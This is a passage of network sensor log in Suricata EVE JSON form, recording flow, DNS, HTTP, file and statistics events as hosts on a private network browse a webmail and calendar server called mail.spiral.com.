"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:13.001675+0000","flow_id":922471664245492,"event_type":"flow","src_ip":"192.168.10.130","src_port":34784,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":12,"bytes_toserver":2881,"bytes_toclient":6890,"start":"2020-02-29T00:10:04.252660+0000","end":"2020-02-29T00:10:12.397842+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:13.403835+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34716,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60620,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:13.512776+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34716,"proto":"UDP","dns":{"type":"answer","id":60620,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:13.512776+0000","flow_id":480231771154811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34716,"proto":"UDP","dns":{"type":"answer","id":60620,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:13.675680+0000","flow_id":1587654728744039,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7917}} {"timestamp":"2020-02-29T00:11:17.000266+0000","flow_id":1979596258201268,"event_type":"flow","src_ip":"192.168.10.130","src_port":34780,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1293,"bytes_toclient":8017,"start":"2020-02-29T00:09:40.904884+0000","end":"2020-02-29T00:10:16.599822+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:18.677072+0000","flow_id":1587654728744039,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52718,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7917},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44800,"tx_id":0}} {"timestamp":"2020-02-29T00:11:18.863063+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54337,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42665,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:11:18.971428+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54337,"proto":"UDP","dns":{"type":"answer","id":42665,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:18.971428+0000","flow_id":1941895041657687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54337,"proto":"UDP","dns":{"type":"answer","id":42665,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:19.028862+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528}} {"timestamp":"2020-02-29T00:11:19.245557+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":0}} 
{"timestamp":"2020-02-29T00:11:19.256442+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34464,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:19.364994+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46411,"proto":"UDP","dns":{"type":"answer","id":34464,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:19.364994+0000","flow_id":316799676049850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46411,"proto":"UDP","dns":{"type":"answer","id":34464,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:19.435239+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":885},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":1}} {"timestamp":"2020-02-29T00:11:19.437553+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":955}} {"timestamp":"2020-02-29T00:11:20.000581+0000","event_type":"stats","stats":{"uptime":14332,"capture":{"kernel_packets":134594,"kernel_drops":0},"decoder":{"pkts":134594,"bytes":92874547,"invalid":185,"ipv4":133109,"ipv6":8,"ethernet":134594,"raw":0,"null":0,"sll":0,"tcp":127877,"udp":5032,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2743,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2759,"synack":2750,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1783,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2297,"failed_udp":111},"tx":{"http":4593,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2376}},"flow_mgr":{"closed_pruned":2726,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20169,"memcap_state":0,"memcap_global":0},"http":{"memuse":84300,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:22.863642+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46116,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26215,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:22.975027+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46116,"proto":"UDP","dns":{"type":"answer","id":26215,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:22.975027+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46116,"proto":"UDP","dns":{"type":"answer","id":26215,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:23.010667+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:11:23.010667+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 
HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:11:24.438797+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":955},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2478,"tx_id":1}} {"timestamp":"2020-02-29T00:11:26.519207+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2913,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:26.627443+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46659,"proto":"UDP","dns":{"type":"answer","id":2913,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:26.627443+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46659,"proto":"UDP","dns":{"type":"answer","id":2913,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:11:26.701011+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412}} {"timestamp":"2020-02-29T00:11:26.701011+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} 
{"timestamp":"2020-02-29T00:11:27.000184+0000","event_type":"stats","stats":{"uptime":14339,"capture":{"kernel_packets":134631,"kernel_drops":0},"decoder":{"pkts":134632,"bytes":92889142,"invalid":185,"ipv4":133147,"ipv6":8,"ethernet":134632,"raw":0,"null":0,"sll":0,"tcp":127911,"udp":5036,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2744,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2760,"synack":2751,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1785,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2299,"failed_udp":111},"tx":{"http":4595,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2378}},"flow_mgr":{"closed_pruned":2726,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":78960,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:28.014904+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34794,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:11:31.000765+0000","flow_id":1641341801378157,"event_type":"flow","src_ip":"192.168.10.122","src_port":43136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:30.700781+0000","end":"2020-02-29T00:06:30.811812+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:31.702838+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52722,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":757,"tx_id":0}} 
{"timestamp":"2020-02-29T00:11:31.748325+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13638,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:31.856514+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48196,"proto":"UDP","dns":{"type":"answer","id":13638,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:31.856514+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48196,"proto":"UDP","dns":{"type":"answer","id":13638,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:32.000674+0000","flow_id":1124421027940285,"event_type":"flow","src_ip":"192.168.10.81","src_port":52714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6725,"start":"2020-02-29T00:10:26.051133+0000","end":"2020-02-29T00:10:31.236100+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:32.016594+0000","flow_id":146057546899732,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34796,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6624}} {"timestamp":"2020-02-29T00:11:34.000232+0000","event_type":"stats","stats":{"uptime":14346,"capture":{"kernel_packets":134652,"kernel_drops":0},"decoder":{"pkts":134664,"bytes":92900687,"invalid":185,"ipv4":133179,"ipv6":8,"ethernet":134664,"raw":0,"null":0,"sll":0,"tcp":127939,"udp":5040,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2746,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2762,"synack":2753,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1787,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2301,"failed_udp":111},"tx":{"http":4597,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2380}},"flow_mgr":{"closed_pruned":2727,"new_pruned":15,"est_pruned":2351,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":74685,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:34.034672+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59771,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46822,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:34.142465+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59771,"proto":"UDP","dns":{"type":"answer","id":46822,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:34.142465+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59771,"proto":"UDP","dns":{"type":"answer","id":46822,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:34.295285+0000","flow_id":128482540935253,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34798,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6982}} {"timestamp":"2020-02-29T00:11:35.996627+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192}} {"timestamp":"2020-02-29T00:11:35.996750+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:11:35.999895+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","state":"CLOSED","stored":false,"size":192,"tx_id":0}} {"timestamp":"2020-02-29T00:11:35.999800+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":0}} {"timestamp":"2020-02-29T00:11:36.001784+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":213}} 